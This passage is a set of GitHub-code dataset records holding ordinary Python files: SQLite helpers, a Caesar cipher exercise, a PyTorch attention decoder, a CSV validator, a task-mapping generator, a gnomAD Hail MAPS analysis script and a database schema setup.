spam.\",ie,drink_id)\n\t\tcon.commit()\n\tc.close()\n\ndef load(location,session_id=None):\n\tpass\n\ndef load_last(location):\n\tcon = sqlite3.connect(location + dbname)\n\tc = con.cursor()\n\ttry:\n\t\tc.execute(last_session)\n\texcept sqlite3.OperationalError as oe:\n\t\tprint(\"No table, must be first run.\")\n\t\treturn (None,[])\n\tret = []\n\tsid = None\n\ttry:\n\t\tsid = c.fetchone()[0]\n\t\tprint(\"sid: \", sid)\n\t\tc.execute(get_session,(sid,))\n\t\tfor row in c.fetchall():\n\t\t\tdrink = Drink(row[3],row[2],row[4],row[5],time.strptime(str(row[0]),\"%Y%m%d%H%M%S\"),row[6])\n\t\t\tif row[7]:\n\t\t\t\tdrink.removed = True\n\t\t\tif not drink.removed:\n\t\t\t\tret.append(drink)\n\t\t\tprint(str(drink),drink.removed)\n\texcept Exception as e:\n\t\tprint(\"Hit an error: \",e)\n\tc.close()\n\tcon.close()\n\treturn (sid,ret)\n\ndef get_Sessions(location):\n\tpass\n","repo_name":"Narcolapser/Flight-Night","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32491972859","text":"\"\"\"\nAll functions to help manipulate data.\n\n\nSuch types of files we use to create some functions to manipulate with data, etc.\n\"\"\"\n\n\ndef get_list_of_values_from_dictionary(list_of_matched_areas: list[dict], key: str) -> list[str]:\n \"\"\"\n Get all id's values in list\n :param locator: barrier or segment id, tollRateId, CalculatedAmount\n :param list_of_matched_areas: list of barriers or segments or tollDto\n :return: id of trips\n \"\"\"\n ids = []\n for value in list_of_matched_areas:\n ids.append(value[key])\n return ids\n","repo_name":"Viktoraspr/test_code_structure","sub_path":"methods/helpers_functions.py","file_name":"helpers_functions.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74749776441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 27 04:05:33 2020\r\n\r\n@author: asumon\r\n\"\"\"\r\n\r\n##CAESER CIPHER Encoding and Decoding process\r\n\r\nalphabet=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\r\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\r\n 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',\r\n 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n\r\n\r\n'''\r\ndirection=input(\"Type 'Encode' to Encrypt, type 'decode' to decrypt:\\n\")\r\n\r\ntext=input(\"Please type your Message:\\n\").lower()\r\n\r\nshift=int(input(\"Type the shift number:\\n\"))\r\n\r\n\r\n#def encrypt():\r\n \r\n \r\n \r\ndef encrypt(plain_text,shift_amount):\r\n cipher_text=\"\"\r\n for letter in plain_text:\r\n position=alphabet.index(letter)\r\n new_position=position+shift_amount\r\n new_letter=alphabet[new_position]\r\n cipher_text += new_letter\r\n print(f\"The Encoded Text is : {cipher_text}\")\r\n \r\n \r\n#encrypt(text,shift)\r\n\r\n\r\ndef decrypt(cipher_text,shift_amount):\r\n plain_text=\"\"\r\n for letter in cipher_text:\r\n position=alphabet.index(letter)\r\n new_position=position-shift_amount\r\n plain_text += alphabet[new_position]\r\n print(f\"Decoded text : {plain_text}\")\r\n \r\nif direction=='encode':\r\n encrypt(plain_text=text, shift_amount=shift)\r\nelif direction=='decode':\r\n decrypt(cipher_text=text, shift_amount=shift)\r\n \r\n'''\r\n \r\n \r\n## IN DIFFERENT WAY TO DO THIS CODE \r\n\r\n#import art Add the ASCII LOGO\r\n\r\n\r\n \r\ndef caeser_cipher(start_text,shift_amount,cipher_direction):\r\n end_text =\"\"\r\n #for letter in start_text:\r\n #position=alphabet.index(letter)\r\n if cipher_direction=='decode':\r\n shift_amount *= -1\r\n for char in start_text:\r\n if char in alphabet:\r\n position=alphabet.index(char)\r\n new_position= position +shift_amount\r\n end_text += alphabet[new_position]\r\n else:\r\n end_text += char\r\n \r\n print(f\"Here is the Cipher Text based on {cipher_direction}d and the Text is: {end_text}\")\r\n\r\n\r\n\r\nshould_continue=True\r\nwhile should_continue:\r\n direction=input(\"Type 'Encode' to Encrypt, type 'decode' to decrypt:\\n\")\r\n text=input(\"Please type your Message:\\n\").lower()\r\n shift=int(input(\"Type the shift number:\\n\"))\r\n shift=shift % 25\r\n caeser_cipher(start_text=text, shift_amount=shift, cipher_direction=direction) \r\n result=input(\"Do you want to continue Yes or No :\")\r\n if result=='no':\r\n should_continue=False\r\n print(\"GOOD BYE\")\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n ","repo_name":"asumon/Python","sub_path":"caeser_cipher.py","file_name":"caeser_cipher.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35370593120","text":"import torch\nfrom torch import nn\nfrom AttentionNetwork import AttentionNetwork\n\nclass DecoderWithAttention(nn.Module):\n\n def __init__(self, attention_dimension, embedding_dimension, decoder_dimension, vocab_size, device = torch.device(\"cpu\"), encoder_dimension=2048, dropout_fraction=0.5):\n super(DecoderWithAttention, self).__init__()\n \n self.device = device\n self.vocab_size = vocab_size\n\n self.attention = AttentionNetwork(encoder_dimension, decoder_dimension, attention_dimension) \n self.embedding = nn.Embedding(vocab_size, embedding_dimension) \n self.dropout = nn.Dropout(p=dropout_fraction)\n self.decode_step = nn.LSTMCell(embedding_dimension + encoder_dimension, decoder_dimension, bias=True) \n self.init_h = nn.Linear(encoder_dimension, decoder_dimension) \n self.init_c = nn.Linear(encoder_dimension, decoder_dimension) \n self.f_beta = nn.Linear(decoder_dimension, encoder_dimension)\n self.sigmoid = nn.Sigmoid()\n self.fc = nn.Linear(decoder_dimension, vocab_size) \n self.init_weights() \n\n\n def init_weights(self):\n self.embedding.weight.data.uniform_(-0.1, 0.1)\n self.fc.bias.data.fill_(0)\n self.fc.weight.data.uniform_(-0.1, 0.1)\n\n\n def load_pretrained_embeddings(self, embeddings):\n self.embedding.weight = nn.Parameter(embeddings)\n\n\n def fine_tune_embeddings(self, fine_tune=True):\n for p in self.embedding.parameters():\n p.requires_grad = fine_tune\n\n\n def init_hidden_state(self, encoder_out):\n mean_encoder_out = encoder_out.mean(dim=1)\n h = self.init_h(mean_encoder_out) \n c = self.init_c(mean_encoder_out)\n return h, c\n\n\n def forward(self, encoder_out, encoded_captions, caption_lengths): \n batch_size = encoder_out.size(0)\n encoder_dimension = encoder_out.size(-1)\n\n encoder_out = encoder_out.view(batch_size, -1, encoder_dimension) \n num_pixels = encoder_out.size(1)\n\n embeddings = self.embedding(encoded_captions) \n\n h, c = self.init_hidden_state(encoder_out) \n\n decode_lengths = (caption_lengths-1).tolist()\n\n \n predictions = torch.zeros(batch_size, max(decode_lengths), self.vocab_size).to(self.device)\n alphas = torch.zeros(batch_size, max(decode_lengths), num_pixels).to(self.device)\n\n for t in range(max(decode_lengths)):\n batch_size_t = sum([l > t for l in decode_lengths])\n \n attention_weighted_encoding, alpha = self.attention(encoder_out[:batch_size_t],\n h[:batch_size_t])\n \n gate = self.sigmoid(self.f_beta(h[:batch_size_t]))\n attention_weighted_encoding = gate * attention_weighted_encoding\n h, c = self.decode_step(\n torch.cat([embeddings[:batch_size_t, t, :], attention_weighted_encoding], dim=1),\n (h[:batch_size_t], c[:batch_size_t]))\n\n preds = self.fc(self.dropout(h))\n predictions[:batch_size_t, t, :] = preds\n alphas[:batch_size_t, t, :] = alpha\n\n\n return predictions, encoded_captions, decode_lengths, alphas","repo_name":"Nobbettt/DiffusionDBPromptCapture","sub_path":"DecoderWithAttention.py","file_name":"DecoderWithAttention.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13613165564","text":"import json\nimport csv\nfrom os.path import exists\n\n\ndef solution(X):\n # We assume X is a csv file\n categories = {\"real\", \"fake\", \"ambiguous\"}\n rows = []\n\n path = exists(X)\n\n # check if X is actually a file, if not return an error\n if path == False:\n raise ValueError(\"File does not exist\")\n\n with open(X, newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n row_values = list(map(tuple, csv_reader))\n\n # Must have 4 columns\n if len(row_values[0]) != 4:\n raise ValueError(\"Number of columns must equal 4\")\n\n (experiment_name, sample_id, fauxness, category_guess) = row_values[0]\n\n # Check to see if headers match\n if experiment_name == 'experiment_name' and sample_id == 'sample_id' and fauxness == 'fauxness' and category_guess == 'category_guess':\n headers = row_values[0]\n del row_values[0]\n for row in row_values:\n # Check to make sure we still have 4 columns per row.\n if len(row) != 4:\n raise ValueError(\"Number of columns must equal 4\")\n\n (experiment_name, sample_id, fauxness, category_guess) = row\n\n # validation\n\n if experiment_name == \"\":\n raise ValueError(\"experiment_name cannot be empty\")\n elif is_valid_sample_id(sample_id) == False:\n raise ValueError(\n \"sample_id must be a positive integer and must be whole numbers.\")\n elif is_valid_fauxness(fauxness) == False:\n raise ValueError(\n \"fauxness is not in the range of 0.0 and 1.0 inclusive.\")\n elif category_guess not in categories:\n raise ValueError(\n \"category_guess must be either real, fake, or ambigious.\")\n else:\n rows.append(row)\n\n # function calls to test below\n\n summaryData = display_summary_data(row_values)\n print(\"Summary Data: \", summaryData)\n\n print(\"JSON: \", display_json(row_values, headers, 0))\n\n print(\"CSV: \", display_csv(row_values, 0))\n print(\"In Memory: \", display_in_memory(row_values, 0))\n else:\n raise ValueError(\"Column headers are invalid.\")\n\n# int -> bool\n\n\ndef is_valid_sample_id(sample_id):\n if sample_id.isdigit() == False or int(sample_id) <= 0:\n return False\n else:\n return True\n\n# float -> bool\n\n\ndef is_valid_fauxness(fauxness):\n if float(fauxness) > 1.0 or float(fauxness) < 0.0:\n return False\n\n potentialFloat = fauxness.replace('.', '', 1).isdigit()\n return potentialFloat\n\n# return json representation of values\n\n\ndef display_json(list_of_tuple, headers, row_number):\n output = dict()\n for idx, key in enumerate(headers):\n output[key] = list_of_tuple[row_number][idx]\n jsonObj = json.dumps(output)\n return jsonObj\n\n# return csv representation of values\n\n\ndef display_csv(rows, row_number):\n csv_representation = \"\"\n for value in rows[row_number]:\n csv_representation += value + \",\"\n return csv_representation\n\n# return in memory representation of values\n\n\ndef display_in_memory(rows, row_number):\n return rows[row_number]\n\n# return summary data is json format\n\n\ndef display_summary_data(rows):\n return json.dumps(rows)\n\n\nsolution('path/to/fauxfile')\n","repo_name":"nimkamp/fauxilizer-5000","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42619459771","text":"#!/usr/bin/python3.6\nimport sys, warnings, operator\nfrom optparse import OptionParser\nfrom random import *\nfrom application import Application\n\ndef randomMapping(value):\n return randint(1,value)\n \ndef generateName(value):\n name = \"A\" + str(value)\n return name\n\ndef generateComputeName(value):\n name = \"compute\" + str(value)\n return name\n\ndef generateMapping(value):\n name = \"M\" + str(value)\n return name\n\ndef randomRate(dist):\n import random\n \n if (dist == \"uniform\"):\n # random.uniform(a, b)\n # Return a random floating point number N such that a <= N <= b for a <= b and b <= N <= a for b < a.\n return round(random.uniform(0.025,0.667),3)\n elif (dist == \"beta\"):\n # random.betavariate(alpha, beta)\n # Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1.\n return round(betavariate(0.025,0.667),3)\n elif (dist == \"expo\"):\n # random.expovariate(lambd)\n # Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero.\n return round(expovariate(0.667),3)\n elif (dist == \"gamma\"):\n # random.gammavariate(alpha, beta)\n # Gamma distribution. (Not the gamma function!) Conditions on the parameters are alpha > 0 and beta > 0.\n return round(gammavariate(0.025,0.667),3)\n elif (dist == \"gauss\"):\n # random.gauss(mu, sigma)\n # Gaussian distribution. mu is the mean, and sigma is the standard deviation.\n return round(gauss(0.025,0.667),3)\n elif (dist == \"pareto\"):\n # random.paretovariate(alpha)\n # Pareto distribution. alpha is the shape parameter.\n return round(paretovariate(0.025),3)\n elif (dist == \"weibull\"):\n # random.weibullvariate(alpha, beta)\n # Weibull distribution. alpha is the scale parameter and beta is the shape parameter.\n return round(weibullvariate(0.025,0.667),3)\n\ndef output2STDOUT(appList, numA, numM):\n applicationList = appList\n numberApplications = numA\n numberMachines = numM\n print(\"// Rate Definitions\")\n print(\"// Rates starting with r are actual or original processing rates\")\n print(\"// Rates starting with p are perturbed processing rates\")\n for i in applicationList:\n print(i.string_rate(),i.string_perturbedRate())\n\n print(\"\\n\")\n print(\"// Application Definitions\")\n for i in applicationList:\n print(i.definition())\n\n print(\"\\n\")\n print(\"// Machine Definition\")\n for x in range(numberMachines):\n combinedString = \"\"\n machineNumber = x + 1\n rateString = \"\"\n perturbedRateString = \"\"\n for y in range(numberApplications):\n applicationNumber = y + 1\n if (generateMapping(machineNumber) == applicationList[y].get_mapping()):\n rateString = rateString + \"(compute\" + str(applicationNumber) + \", r\" + str(applicationNumber) + \").\"\n perturbedRateString = perturbedRateString + \"(compute\" + str(applicationNumber) + \", p\" + str(applicationNumber) + \").\"\n rateString = rateString + \"M\" + str(machineNumber)\n perturbedRateString = perturbedRateString + \"M\" + str(machineNumber)\n combinedString = \"M\" + str(machineNumber) + \" = \" + rateString + \" + \" + perturbedRateString + \";\"\n print(combinedString)\n\n print(\"\\n\")\n applicationString = \"(\"\n print(\"// System Equation for Mapping Definition\")\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n applicationString = applicationString + generateName(number) + \" <> \"\n else:\n applicationString = applicationString + generateName(number) + \")\"\n\n computeString = \"<\"\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n computeString = computeString + generateComputeName(number) + \", \"\n else:\n computeString = computeString + generateComputeName(number) + \">\"\n\n machineString = \"(\"\n for x in range(numberMachines):\n number = x + 1\n if (number < numberMachines):\n machineString = machineString + generateMapping(number) + \" <> \"\n else:\n machineString = machineString + generateMapping(number) + \")\"\n\n systemEquation = applicationString + \" \" + computeString + \" \" + machineString\n print(systemEquation)\n\ndef output2FILE(appList, numA, numM, filename):\n applicationList = appList\n numberApplications = numA\n numberMachines = numM\n outputfile = filename\n f = open(outputfile, \"w\")\n f.write(\"// Rate Definitions\\n\")\n f.write(\"// Rates starting with r are actual or original processing rates\\n\")\n f.write(\"// Rates starting with p are perturbed processing rates\\n\")\n for i in applicationList:\n my_rate = i.string_rate()\n my_perturbedRate = i.string_perturbedRate()\n my_string = my_rate + \" \" + my_perturbedRate + \"\\n\"\n f.write(my_string)\n\n f.write(\"\\n\")\n f.write(\"// Application Definitions\\n\")\n for i in applicationList:\n my_definition = i.definition()\n my_string = my_definition + \"\\n\"\n f.write(my_string)\n\n f.write(\"\\n\")\n f.write(\"// Machine Definition\\n\")\n for x in range(numberMachines):\n combinedString = \"\"\n machineNumber = x + 1\n rateString = \"\"\n perturbedRateString = \"\"\n for y in range(numberApplications):\n applicationNumber = y + 1\n if (generateMapping(machineNumber) == applicationList[y].get_mapping()):\n rateString = rateString + \"(compute\" + str(applicationNumber) + \", r\" + str(applicationNumber) + \").\"\n perturbedRateString = perturbedRateString + \"(compute\" + str(applicationNumber) + \", p\" + str(applicationNumber) + \").\"\n rateString = rateString + \"M\" + str(machineNumber)\n perturbedRateString = perturbedRateString + \"M\" + str(machineNumber)\n combinedString = \"M\" + str(machineNumber) + \" = \" + rateString + \" + \" + perturbedRateString + \";\"\n f.write(combinedString + \"\\n\")\n\n f.write(\"\\n\")\n applicationString = \"(\"\n f.write(\"// System Equation for Mapping Definition\\n\")\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n applicationString = applicationString + generateName(number) + \" <> \"\n else:\n applicationString = applicationString + generateName(number) + \")\"\n\n computeString = \"<\"\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n computeString = computeString + generateComputeName(number) + \", \"\n else:\n computeString = computeString + generateComputeName(number) + \">\"\n\n machineString = \"(\"\n for x in range(numberMachines):\n number = x + 1\n if (number < numberMachines):\n machineString = machineString + generateMapping(number) + \" <> \"\n else:\n machineString = machineString + generateMapping(number) + \")\"\n\n systemEquation = applicationString + \" \" + computeString + \" \" + machineString\n f.write(systemEquation + \"\\n\")\n f.close()\n\ndef main():\n\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n usage = \"usage: %prog [options]\" \n parser = OptionParser(usage=usage, version=\"%prog v 0.1\")\n parser.add_option(\"-a\", \"--applications\", action=\"store\", dest=\"numberApplications\", help=\"number of applications [DEFAULT=20]\")\n parser.add_option(\"-m\", \"--machines\", action=\"store\", dest=\"numberMachines\", help=\"number of machines [DEFAULT=5]\")\n parser.add_option(\"-d\", \"--distribution\", action=\"store\", dest=\"distribution\", help=\"statistical distribution [DEFAULT=uniform]\")\n parser.add_option(\"-o\", \"--output\", action=\"store\", dest=\"outputName\", help=\"output file name [DEFAULT=STDOUT]\")\n parser.add_option(\"-c\", \"--constant\", action=\"store\", dest=\"constantFile\", help=\"use pregenerated set of applications, generate mappings [DEFAULT=NA]\")\n\n (options, args) = parser.parse_args()\n\n if (options.numberApplications):\n numberApplications = int(options.numberApplications)\n else:\n numberApplications = 20\n\n if (options.numberMachines):\n numberMachines = int(options.numberMachines)\n else:\n numberMachines = 5\n \n if (options.distribution):\n if (options.distribution == \"uniform\"):\n distribution = \"uniform\"\n elif (options.distribution == \"beta\"):\n distribution = \"beta\"\n elif (options.distribution == \"expo\"):\n distribution = \"expo\"\n elif (options.distribution == \"gamma\"):\n distribution = \"gamma\"\n elif (options.distribution == \"gauss\"):\n distribution = \"gauss\"\n elif (options.distribution == \"pareto\"):\n distribution = \"pareto\"\n elif (options.distribution == \"weibull\"):\n distribution = \"weibull\"\n else: \n distribution = \"uniform\"\n\n n = numberApplications # number of applications\n k = numberMachines # number of machines\n applicationList = [i+1 for i in range(n)]\n machineList = [i+1 for i in range(k)]\n\n # if k > n, or n < k...exit with message\n if (k > n): # if number of machines is greater than the number of applications\n print(\"ERROR: Invalid Option: #Machines > #Applications\")\n exit()\n \n elif (n < k): # if number of applications is less than the number of machines\n print(\"ERROR: Invalid Option: #Applications < #Machines\")\n exit()\n\n if (n < (2*k)):\n print(\"ERROR: Invalid Option: Need at Least 2 Applications per Machine\")\n exit()\n\n # initialize and/or n = k\n mySet = set([])\n while (len(mySet) < (2*k)):\n mySet.add(randrange(1,n+1))\n\n newList = list(mySet)\n perList = 2\n splitList = [newList[i * perList:(i + 1) * perList] for i in range((len(newList) + perList - 1) // perList )]\n myMappings = {} # empty dictionary\n myMachine = 1\n while (myMachine <= k):\n myMappings[myMachine] = splitList[myMachine -1]\n for element in (splitList[myMachine -1]):\n applicationList.remove(element)\n myMachine = myMachine + 1\n \n\n # finish mapping applications to machines\n myRange = len(applicationList)\n for item in applicationList:\n myMachine = randrange(1,k+1)\n tempList = myMappings[myMachine]\n tempList.append(item)\n myMappings[myMachine] = tempList\n\n masterApplicationList = []\n for machine in myMappings:\n myApplicationList = myMappings[machine]\n for application in myApplicationList:\n perturbed = 2.0\n normal = randomRate(distribution)\n while (perturbed > normal):\n perturbed = randomRate(distribution)\n\n myApplication = Application(application,generateName(application),normal,perturbed,generateComputeName(application),generateMapping(machine))\n output = myApplication.print_values()\n masterApplicationList.append(myApplication)\n \n \n masterApplicationList.sort(key=operator.attrgetter('key'))\n\n\n if (options.outputName):\n output2FILE(masterApplicationList, numberApplications, numberMachines, options.outputName)\n else: \n output2STDOUT(masterApplicationList, numberApplications, numberMachines)\n\nif __name__ == '__main__':\n main()","repo_name":"williamssanders/generateMappings","sub_path":"mappings.py","file_name":"mappings.py","file_ext":"py","file_size_in_byte":11519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8745884881","text":"'''\nNot this is effectively the exact same script as maps_submit_per_class but instead of using GTEx, using 151 Brain Cortex samples quantified\nsalmon and RSEM. I just wanted to be super clear as to how each file was created\n'''\n\n# For code to run, need to git clone onto gnomad_lof on cluster\nimport sys\nsys.path.append('/home/hail/gnomad_lof')\n\nfrom gnomad_hail import *\nfrom gnomad_hail.resources.sample_qc import *\nfrom gnomad_hail.utils.plotting import *\nfrom constraint_utils import *\nfrom tx_annotation import *\n\ndef load_tx_expression_data(tx_ht):\n tx_ht = tx_ht.rows()\n\n def process_expression_data(csq_expression):\n exprs_to_drop = ['ensg', 'csq', 'symbol', 'lof', 'lof_flag', 'mean_proportion']\n expression_data = csq_expression.drop(*exprs_to_drop)\n all_tissues = list(expression_data.values())\n expression_data_list = list(zip(list(expression_data), all_tissues))\n brain_tissues = [x[1] for x in expression_data_list if 'Brain' in x[0]]\n return csq_expression.select('ensg', 'csq', 'symbol', 'lof', 'lof_flag',\n mean_expression=hl.mean(hl.filter(lambda e: ~hl.is_nan(e), all_tissues), filter_missing=True),\n mean_brain_expression=hl.mean(hl.filter(lambda f: ~hl.is_nan(f), brain_tissues), filter_missing=True),\n Brain_Cortex=csq_expression.Brain_Cortex\n )\n\n return tx_ht.annotate(tx_annotation=tx_ht.tx_annotation.map(process_expression_data))\n\ncontext_ht_path = \"gs://gnomad-public/papers/2019-flagship-lof/v1.0/context/Homo_sapiens_assembly19.fasta.snps_only.vep_20181129.ht\"\ncontext_ht = hl.read_table(context_ht_path)\n\n# Import and process gnomad 2.1.1 transcript annotation\nht = hl.read_matrix_table('gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/data/gnomad.exomes.r2.1.1.sites.tx_annotated.brain.cortex.salmon.020520.mt')\nht = ht.filter_rows(~hl.is_missing(ht.tx_annotation))\nht = ht.annotate_rows(tx_annotation = ht.tx_annotation.map(fix_loftee_beta_nonlofs))\nht = load_tx_expression_data(ht)\nht = hl.MatrixTable.from_rows_table(ht)\nht = pull_out_worst_from_tx_annotate(ht)\n\n# Only consider variants that pass RF\nht = ht.rows()\nht = ht.filter(hl.len(ht.filters) == 0)\ncontext = context_ht[ht.key]\nht = ht.annotate(context=context.context, methylation=context.methylation)\nht = prepare_ht(ht, trimer=True, annotate_coverage=False)\n\n# Prepare MAPS data\neven_breaks = [0.999, 0.995, 0.99, 0.98] + list(map(lambda x: x/40, range(39, -1, -1)))\n\nht = ht.filter(ht.freq[0].AN > 125748 * 0.8 * 2)\nmutation_ht = hl.read_table(mutation_rate_ht_path)\n\n\n# Only consider LOFTEE HC pLoFs, missense and synonymous\nht = ht.annotate(keep = hl.case(missing_false=True)\n .when((ht.csq == \"stop_gained\") &(ht.lof == 'HC'), \"keep\")\n .when((ht.csq == \"splice_donor_variant\") &(ht.lof == 'HC'), \"keep\")\n .when((ht.csq == \"splice_acceptor_variant\" ) &(ht.lof == 'HC'), \"keep\")\n .when(ht.csq == \"missense_variant\", \"keep\")\n .when(ht.csq == \"synonymous_variant\", \"keep\").default('filter'))\n\n\nht = ht.filter(ht.keep == \"keep\")\n\n# # Group pLoFs, remember can't calculate MAPs on frameshifts (no mutational model)\nht = ht.annotate(worst_csq = hl.case(missing_false=True)\n .when(ht.csq == \"stop_gained\", \"pLoF\")\n .when(ht.csq == \"splice_donor_variant\", \"pLoF\")\n .when(ht.csq == \"splice_acceptor_variant\", \"pLoF\")\n .when(ht.csq == \"missense_variant\", \"missense_variant\")\n .when(ht.csq == \"synonymous_variant\", \"synonymous_variant\").default('irrev_var'),\n lof = ht.lof)\n\n# # Group pLoFs, remember can't calculate MAPs on frameshifts (no mutational model)\n# ht = ht.annotate(worst_csq = hl.case(missing_false=True)\n# .when(ht.csq == \"stop_gained\", \"stop_gained\")\n# .when(ht.csq == \"splice_donor_variant\", \"splice_donor_variant\")\n# .when(ht.csq == \"splice_acceptor_variant\", \"splice_acceptor_variant\")\n# .when(ht.csq == \"missense_variant\", \"missense_variant\")\n# .when(ht.csq == \"synonymous_variant\", \"synonymous_variant\").default('irrev_var'),lof = ht.lof)\n\nprint(\"finished processing\")\n\nconstraint = hl.read_table(constraint_ht_path)\nconstraint = constraint.rename({\"gene\": \"symbol\"})\nconstraint = constraint.key_by(\"symbol\")\nht = ht.key_by(\"symbol\")\n\nht_constraint = ht.annotate(constraint_bin = constraint[ht.symbol].oe_lof_upper_bin,\n constraint_value = constraint[ht.symbol].oe_lof_upper)\n\n# Addded in filtering for max pext low genes\ngenes_to_filter = hl.import_table(\"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/data/salmon_max_pext_low_genes.020520.tsv.bgz\", force = True)\ngenes_to_filter = genes_to_filter.key_by('symbol')\n\nht_constraint = ht_constraint.filter(~hl.is_defined(genes_to_filter[ht_constraint.key]))\n\n\ndef run_maps_constraint_binexport(f, write, mut_ht = mutation_ht):\n m = maps(f, mut_ht, ['constraint_bin'])\n m.export(write)\n\noe_constraint_bin_below_01 = ht_constraint.filter(ht_constraint.Brain_Cortex < 0.1)\nrun_maps_constraint_binexport(oe_constraint_bin_below_01,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.low.020520.tsv.bgz\")\nprint('wrote low')\n\noe_constraint_bin_above_09 = ht_constraint.filter(ht_constraint.Brain_Cortex > 0.9)\nrun_maps_constraint_binexport(oe_constraint_bin_above_09,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.high.020520.tsv.bgz\")\n\nprint('wrote high')\n\noe_constraint_bin_between = ht_constraint.filter((ht_constraint.Brain_Cortex <= 0.9) & (ht_constraint.Brain_Cortex >= 0.1))\nrun_maps_constraint_binexport(oe_constraint_bin_between,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.medium.020520.tsv.bgz\")\n","repo_name":"macarthur-lab/tx_annotation","sub_path":"analyses/rsem_salmon/maps_rsem_vs_salmon.py","file_name":"maps_rsem_vs_salmon.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"40"} +{"seq_id":"29978722152","text":"#####**************************************************************************#####\n#####\t\t\t\t\t\t\t\tDESCRIPTION\t \t\t\t\t\t\t #####\n#####**************************************************************************#####\n\"\"\"Pre-testing of methods for the Export Records Digitization Project, in particular\nthe back end database.\n\nIssues to to be worked out:\n+ getting info from a csv file\n+ creating the database\n\n\"\"\"\n\nimport sqlite3, os, csv\nos.chdir(r'E:\\MGMA Application Digitization Setup\\Setup\\Application\\DataBase')\n\n####******************************Getting Data From CSV File*********************### \ndata_tuples = [] # container for my tuples\n\nwith open('MGMA_Members.csv', 'rb') as csvfile:\n\tcsvreader = csv.reader(csvfile, dialect = 'excel')\n\tfor line in csvreader:\n\t\tdata_tuples.append(tuple([entry.replace('\\r', \"\").replace('\\n', '').replace('\\xa0', '').upper() \n for entry in line]))\n\ndata_tuples[:5]\n#\n#Test that all tuples are len 5\nall([len(tup) == 3 for tup in data_tuples])\n#Test that there are no None values\nall(test for test in [(val is not None) for tup in data_tuples for val in tup])\n\n\n####******************************Creating the Database**************************###\n#create database:\nconn = sqlite3.connect('Factory_Import_Licences.db')\nc = conn.cursor()\n\n#Members Table\nc.execute(\"CREATE TABLE members \\\n (fact_id TEXT PRIMARY KEY,\\\n\tfact_name TEXT NOT NULL,\\\n\tfact_address TEXT NOT NULL)\")\nc.executemany('INSERT INTO members VALUES (?,?,?)', data_tuples)\n\n\n#Order Table\nc.execute(\"CREATE TABLE orders \\\n\t(order_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t fact_id TEXT FOREIGN_KEY REFERENCES members(fact_id), \\\n\t mgma_order_id TEXT NOT NULL, \\\n\t buyer TEXT NOT NULL, \\\n\t sub_date TEXT NOT NULL, \\\n\t app_date TEXT NOT NULL, \\\n\t ship_date TEXT NOT NULL, \\\n\t order_fob_curr TEXT NOT NULL,\\\n\t order_cmp_curr TEXT NOT NULL, \\\n\t order_cif_curr TEXT NOT NULL, \\\n\t order_total_fob REAL NOT NULL, \\\n\t order_total_cmp REAL NOT NULL, \\\n\t order_total_cif REAL NOT NULL,\\\n\t num_export_items INTEGER NOT NULL,\\\n\t total_export_quantity INTEGER NOT NULL,\\\n\t num_import_items INTEGER NOT NULL)\")\n\t\t \n#Order Countries\nc.execute(\"CREATE TABLE order_countries \\\n\t(order_id INTEGER FOREIGN_KEY REFERENCES orders(order_id), \\\n\t destination_country TEXT NOT NULL)\")\n\n#Export Items\nc.execute(\"CREATE TABLE export_items \\\n\t(order_id INTEGER FOREIGN_KEY REFERENCES orders(order_id), \\\n\t export_item_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t export_category TEXT NOT NULL, \\\n\t export_type TEXT NOT NULL, \\\n\t export_description TEXT NOT NULL, \\\n\t export_units INTEGER NOT NULL,\\\n\t export_fob_curr TEXT NOT NULL, \\\n\t export_cmp_curr TEXT NOT NULL,\\\n\t export_fob_value REAL NOT NULL, \\\n\t export_cmp_value REAL NOT NULL)\")\n\n#Import Items\nc.execute(\"CREATE TABLE input_items \\\n\t(order_id INTEGER FOREIGN_KEY REFERENCES orders(order_id), \\\n\t input_item_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t input_type TEXT NOT NULL,\\\n\t input_descript TEXT NOT NULL,\\\n\t input_unit TEXT NOT NULL, \\\n\t input_quantity INTERGER NOT NULL,\\\n\t input_curr TEXT NOT NULL, \\\n\t input_value REAL NOT NULL)\")\n\t\t \n#Import/Export 